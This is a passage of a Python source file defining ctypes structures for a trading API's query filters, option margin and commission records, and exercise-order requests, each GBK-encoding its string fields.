        # GBK-encode a non-empty user ID; otherwise keep the ctypes zero default.
        if UserID:
            setattr(self, "UserID", UserID.encode("GBK"))
class QryUserSession(Struct):
    """User-session query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]

    def __init__(self, FrontID=None, SessionID=None, BrokerID=None, UserID=None):
        super().__init__()
        # Copy non-zero numeric arguments verbatim.
        for field, value in (("FrontID", FrontID), ("SessionID", SessionID)):
            if value:
                setattr(self, field, value)
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (("BrokerID", BrokerID), ("UserID", UserID)):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryPartBroker(Struct):
    """Participant-broker query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("ParticipantID", c_char_Array_11),
    ]

    def __init__(self, ExchangeID=None, BrokerID=None, ParticipantID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("ExchangeID", ExchangeID),
            ("BrokerID", BrokerID),
            ("ParticipantID", ParticipantID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryFrontStatus(Struct):
    """Front-status query filter keyed by front ID."""
    _fields_ = [
        ("FrontID", c_int),
    ]

    def __init__(self, FrontID=None):
        super().__init__()
        # Copy a non-zero front ID verbatim; otherwise keep the ctypes zero default.
        if FrontID:
            setattr(self, "FrontID", FrontID)
class QryExchangeOrder(Struct):
    """Exchange-order query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]

    def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("ExchangeID", ExchangeID),
            ("TraderID", TraderID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryOrderAction(Struct):
    """Order-action query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryExchangeOrderAction(Struct):
    """Exchange order-action query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]

    def __init__(self, ParticipantID=None, ClientID=None, ExchangeID=None, TraderID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeID", ExchangeID),
            ("TraderID", TraderID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QrySuperUser(Struct):
    """Super-user query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("UserID", c_char_Array_16),
    ]

    def __init__(self, UserID=None):
        super().__init__()
        # GBK-encode a non-empty user ID; otherwise keep the ctypes zero default.
        if UserID:
            setattr(self, "UserID", UserID.encode("GBK"))
class QryExchange(Struct):
    """Exchange query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, ExchangeID=None):
        super().__init__()
        # GBK-encode a non-empty exchange ID; otherwise keep the ctypes zero default.
        if ExchangeID:
            setattr(self, "ExchangeID", ExchangeID.encode("GBK"))
class QryProduct(Struct):
    """Product query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("ProductID", c_char_Array_31),
        ("ProductClass", c_char),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, ProductID=None, ProductClass=None, ExchangeID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("ProductID", ProductID),
            ("ProductClass", ProductClass),
            ("ExchangeID", ExchangeID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryInstrument(Struct):
    """Instrument query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("ExchangeInstID", c_char_Array_31),
        ("ProductID", c_char_Array_31),
    ]

    def __init__(self, InstrumentID=None, ExchangeID=None, ExchangeInstID=None, ProductID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("ExchangeInstID", ExchangeInstID),
            ("ProductID", ProductID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryDepthMarketData(Struct):
    """Depth market-data query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, InstrumentID=None, ExchangeID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (("InstrumentID", InstrumentID), ("ExchangeID", ExchangeID)):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryBrokerUser(Struct):
    """Broker-user query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]

    def __init__(self, BrokerID=None, UserID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (("BrokerID", BrokerID), ("UserID", UserID)):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryBrokerUserFunction(Struct):
    """Broker-user function query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]

    def __init__(self, BrokerID=None, UserID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (("BrokerID", BrokerID), ("UserID", UserID)):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryTraderOffer(Struct):
    """Trader-offer query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("TraderID", c_char_Array_21),
    ]

    def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("TraderID", TraderID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QrySyncDeposit(Struct):
    """Sync-deposit query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("DepositSeqNo", c_char_Array_15),
    ]

    def __init__(self, BrokerID=None, DepositSeqNo=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (("BrokerID", BrokerID), ("DepositSeqNo", DepositSeqNo)):
            if value:
                setattr(self, field, value.encode("GBK"))
class QrySettlementInfo(Struct):
    """Settlement-info query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, TradingDay=None, AccountID=None, CurrencyID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("TradingDay", TradingDay),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryExchangeMarginRate(Struct):
    """Exchange margin-rate query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None, ExchangeID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryExchangeMarginRateAdjust(Struct):
    """Exchange margin-rate adjustment query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
    ]

    def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryExchangeRate(Struct):
    """Currency exchange-rate query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("FromCurrencyID", c_char_Array_4),
        ("ToCurrencyID", c_char_Array_4),
    ]

    def __init__(self, BrokerID=None, FromCurrencyID=None, ToCurrencyID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("FromCurrencyID", FromCurrencyID),
            ("ToCurrencyID", ToCurrencyID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QrySyncFundMortgage(Struct):
    """Sync fund-mortgage query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("MortgageSeqNo", c_char_Array_15),
    ]

    def __init__(self, BrokerID=None, MortgageSeqNo=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (("BrokerID", BrokerID), ("MortgageSeqNo", MortgageSeqNo)):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryHisOrder(Struct):
    """Historical-order query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("InsertTimeStart", c_char_Array_9),
        ("InsertTimeEnd", c_char_Array_9),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, OrderSysID=None, InsertTimeStart=None, InsertTimeEnd=None, TradingDay=None, SettlementID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("OrderSysID", OrderSysID),
            ("InsertTimeStart", InsertTimeStart),
            ("InsertTimeEnd", InsertTimeEnd),
            ("TradingDay", TradingDay),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy a non-zero settlement ID verbatim.
        if SettlementID:
            setattr(self, "SettlementID", SettlementID)
class OptionInstrMiniMargin(Struct):
    """Option instrument minimum-margin record; string fields are stored GBK-encoded."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("MinMargin", c_double),
        ("ValueMethod", c_char),
        ("IsRelative", c_int),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, MinMargin=None, ValueMethod=None, IsRelative=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ValueMethod", ValueMethod),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (("MinMargin", MinMargin), ("IsRelative", IsRelative)):
            if value:
                setattr(self, field, value)
class OptionInstrMarginAdjust(Struct):
    """Option instrument margin-adjustment record; string fields are stored GBK-encoded."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("SShortMarginRatioByMoney", c_double),
        ("SShortMarginRatioByVolume", c_double),
        ("HShortMarginRatioByMoney", c_double),
        ("HShortMarginRatioByVolume", c_double),
        ("AShortMarginRatioByMoney", c_double),
        ("AShortMarginRatioByVolume", c_double),
        ("IsRelative", c_int),
        ("MShortMarginRatioByMoney", c_double),
        ("MShortMarginRatioByVolume", c_double),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, SShortMarginRatioByMoney=None, SShortMarginRatioByVolume=None, HShortMarginRatioByMoney=None, HShortMarginRatioByVolume=None, AShortMarginRatioByMoney=None, AShortMarginRatioByVolume=None, IsRelative=None, MShortMarginRatioByMoney=None, MShortMarginRatioByVolume=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (
            ("SShortMarginRatioByMoney", SShortMarginRatioByMoney),
            ("SShortMarginRatioByVolume", SShortMarginRatioByVolume),
            ("HShortMarginRatioByMoney", HShortMarginRatioByMoney),
            ("HShortMarginRatioByVolume", HShortMarginRatioByVolume),
            ("AShortMarginRatioByMoney", AShortMarginRatioByMoney),
            ("AShortMarginRatioByVolume", AShortMarginRatioByVolume),
            ("IsRelative", IsRelative),
            ("MShortMarginRatioByMoney", MShortMarginRatioByMoney),
            ("MShortMarginRatioByVolume", MShortMarginRatioByVolume),
        ):
            if value:
                setattr(self, field, value)
class OptionInstrCommRate(Struct):
    """Option instrument commission-rate record; string fields are stored GBK-encoded."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OpenRatioByMoney", c_double),
        ("OpenRatioByVolume", c_double),
        ("CloseRatioByMoney", c_double),
        ("CloseRatioByVolume", c_double),
        ("CloseTodayRatioByMoney", c_double),
        ("CloseTodayRatioByVolume", c_double),
        ("StrikeRatioByMoney", c_double),
        ("StrikeRatioByVolume", c_double),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None, StrikeRatioByMoney=None, StrikeRatioByVolume=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (
            ("OpenRatioByMoney", OpenRatioByMoney),
            ("OpenRatioByVolume", OpenRatioByVolume),
            ("CloseRatioByMoney", CloseRatioByMoney),
            ("CloseRatioByVolume", CloseRatioByVolume),
            ("CloseTodayRatioByMoney", CloseTodayRatioByMoney),
            ("CloseTodayRatioByVolume", CloseTodayRatioByVolume),
            ("StrikeRatioByMoney", StrikeRatioByMoney),
            ("StrikeRatioByVolume", StrikeRatioByVolume),
        ):
            if value:
                setattr(self, field, value)
class OptionInstrTradeCost(Struct):
    """Option instrument trade-cost record; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
        ("FixedMargin", c_double),
        ("MiniMargin", c_double),
        ("Royalty", c_double),
        ("ExchFixedMargin", c_double),
        ("ExchMiniMargin", c_double),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, HedgeFlag=None, FixedMargin=None, MiniMargin=None, Royalty=None, ExchFixedMargin=None, ExchMiniMargin=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (
            ("FixedMargin", FixedMargin),
            ("MiniMargin", MiniMargin),
            ("Royalty", Royalty),
            ("ExchFixedMargin", ExchFixedMargin),
            ("ExchMiniMargin", ExchMiniMargin),
        ):
            if value:
                setattr(self, field, value)
class QryOptionInstrTradeCost(Struct):
    """Option trade-cost query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
        ("InputPrice", c_double),
        ("UnderlyingPrice", c_double),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, HedgeFlag=None, InputPrice=None, UnderlyingPrice=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (("InputPrice", InputPrice), ("UnderlyingPrice", UnderlyingPrice)):
            if value:
                setattr(self, field, value)
class QryOptionInstrCommRate(Struct):
    """Option commission-rate query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class IndexPrice(Struct):
    """Index-price record; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("ClosePrice", c_double),
    ]

    def __init__(self, BrokerID=None, InstrumentID=None, ClosePrice=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (("BrokerID", BrokerID), ("InstrumentID", InstrumentID)):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy a non-zero close price verbatim.
        if ClosePrice:
            setattr(self, "ClosePrice", ClosePrice)
class InputExecOrder(Struct):
    """Exercise-order input request; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExecOrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("Volume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("ActionType", c_char),
        ("PosiDirection", c_char),
        ("ReservePositionFlag", c_char),
        ("CloseFlag", c_char),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("ClientID", c_char_Array_11),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExecOrderRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExecOrderRef", ExecOrderRef),
            ("UserID", UserID),
            ("BusinessUnit", BusinessUnit),
            ("OffsetFlag", OffsetFlag),
            ("HedgeFlag", HedgeFlag),
            ("ActionType", ActionType),
            ("PosiDirection", PosiDirection),
            ("ReservePositionFlag", ReservePositionFlag),
            ("CloseFlag", CloseFlag),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
            ("ClientID", ClientID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (("Volume", Volume), ("RequestID", RequestID)):
            if value:
                setattr(self, field, value)
class InputExecOrderAction(Struct):
    """Exercise-order action (cancel/modify) request; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExecOrderActionRef", c_int),
        ("ExecOrderRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("ExecOrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("UserID", c_char_Array_16),
        ("InstrumentID", c_char_Array_31),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, ExecOrderActionRef=None, ExecOrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExecOrderRef", ExecOrderRef),
            ("ExchangeID", ExchangeID),
            ("ExecOrderSysID", ExecOrderSysID),
            ("ActionFlag", ActionFlag),
            ("UserID", UserID),
            ("InstrumentID", InstrumentID),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (
            ("ExecOrderActionRef", ExecOrderActionRef),
            ("RequestID", RequestID),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
        ):
            if value:
                setattr(self, field, value)
class ExecOrder(Struct):
    """Exercise-order state record; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExecOrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("Volume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("ActionType", c_char),
        ("PosiDirection", c_char),
        ("ReservePositionFlag", c_char),
        ("CloseFlag", c_char),
        ("ExecOrderLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderSubmitStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("ExecOrderSysID", c_char_Array_21),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("ExecResult", c_char),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("UserProductInfo", c_char_Array_11),
        ("StatusMsg", c_char_Array_81),
        ("ActiveUserID", c_char_Array_16),
        ("BrokerExecOrderSeq", c_int),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExecOrderRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExecOrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, ExecOrderSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, ActiveUserID=None, BrokerExecOrderSeq=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExecOrderRef", ExecOrderRef),
            ("UserID", UserID),
            ("BusinessUnit", BusinessUnit),
            ("OffsetFlag", OffsetFlag),
            ("HedgeFlag", HedgeFlag),
            ("ActionType", ActionType),
            ("PosiDirection", PosiDirection),
            ("ReservePositionFlag", ReservePositionFlag),
            ("CloseFlag", CloseFlag),
            ("ExecOrderLocalID", ExecOrderLocalID),
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("TraderID", TraderID),
            ("OrderSubmitStatus", OrderSubmitStatus),
            ("TradingDay", TradingDay),
            ("ExecOrderSysID", ExecOrderSysID),
            ("InsertDate", InsertDate),
            ("InsertTime", InsertTime),
            ("CancelTime", CancelTime),
            ("ExecResult", ExecResult),
            ("ClearingPartID", ClearingPartID),
            ("UserProductInfo", UserProductInfo),
            ("StatusMsg", StatusMsg),
            ("ActiveUserID", ActiveUserID),
            ("BranchID", BranchID),
            ("InvestUnitID", InvestUnitID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
        # Copy non-zero numeric arguments verbatim.
        for field, value in (
            ("Volume", Volume),
            ("RequestID", RequestID),
            ("InstallID", InstallID),
            ("NotifySequence", NotifySequence),
            ("SettlementID", SettlementID),
            ("SequenceNo", SequenceNo),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("BrokerExecOrderSeq", BrokerExecOrderSeq),
        ):
            if value:
                setattr(self, field, value)
class ExecOrderAction(Struct):
    """Exercise-order action state record; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExecOrderActionRef", c_int),
        ("ExecOrderRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("ExecOrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("ExecOrderLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("ActionType", c_char),
        ("StatusMsg", c_char_Array_81),
        ("InstrumentID", c_char_Array_31),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
